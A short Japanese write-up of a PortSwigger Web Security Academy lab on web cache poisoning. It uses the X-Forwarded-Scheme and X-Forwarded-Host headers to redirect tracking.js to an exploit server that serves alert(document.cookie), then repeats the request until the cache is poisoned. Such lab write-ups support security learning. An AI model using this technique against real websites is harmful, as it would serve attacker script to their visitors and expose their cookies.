Hello there, ('ω')ノ

 

複数のヘッダーを使用したWebキャッシュポイズニングを。

 

一部のWebサイトは単純なキャッシュポイズニングに脆弱のようで。

ただし、高度な攻撃も必要だったりと。

複数のキーのない入力を操作するリクエストを作成できる場合にのみ脆弱になったり。

悪意のあるURLにリダイレクトするキャッシュ可能な応答を生成することもあって。

 

 

trackingのリクエストをRepeaterに送信して。

 

 

そのままSendするとレスポンスを見て、何も影響がなく。

　HTTP/1.1 200 OK

 

 

 

下記を追加してSendしても、レスポンスを見ると何も影響がなく。
　X-Forwarded-Host: example.com

 

 

下記に置き換えてSendすると。

　X-Forwarded-Scheme: example.com

 

HTTPS以外の値なので。

レスポンスがexample.comに対して、URLが一時的に変更されたという応答が。

　HTTP/1.1 302 Found

 

 

下記の２つを追加してSendして、レスポンスを見ると何も影響がなく。

　X-Forwarded-Scheme: example.com
　X-Forwarded-Host: example.com

 

 

レスポンスから下記のURLをコピーして。

　/resources/js/tracking.js

 

 

Exploit Serverを起動して、コピーした内容をFileに。

Bodyには、下記のペイロードを。

　alert(document.cookie)

 

最後にStoreして。

 

 

Exploit ServerのURLをリクエストに入力して。

　X-Forwarded-Host: ac761f861f62c59280b5163b019700c6.web-security-academy.net

 

X-Cache: hitが表示されるまでSendして。

 

 

キャッシュが正常にポイズニングされて、ペイロードのスクリプトが表示されて。

 

 

リロードするとクリアできた。

 

 

Best regards, (^^ゞ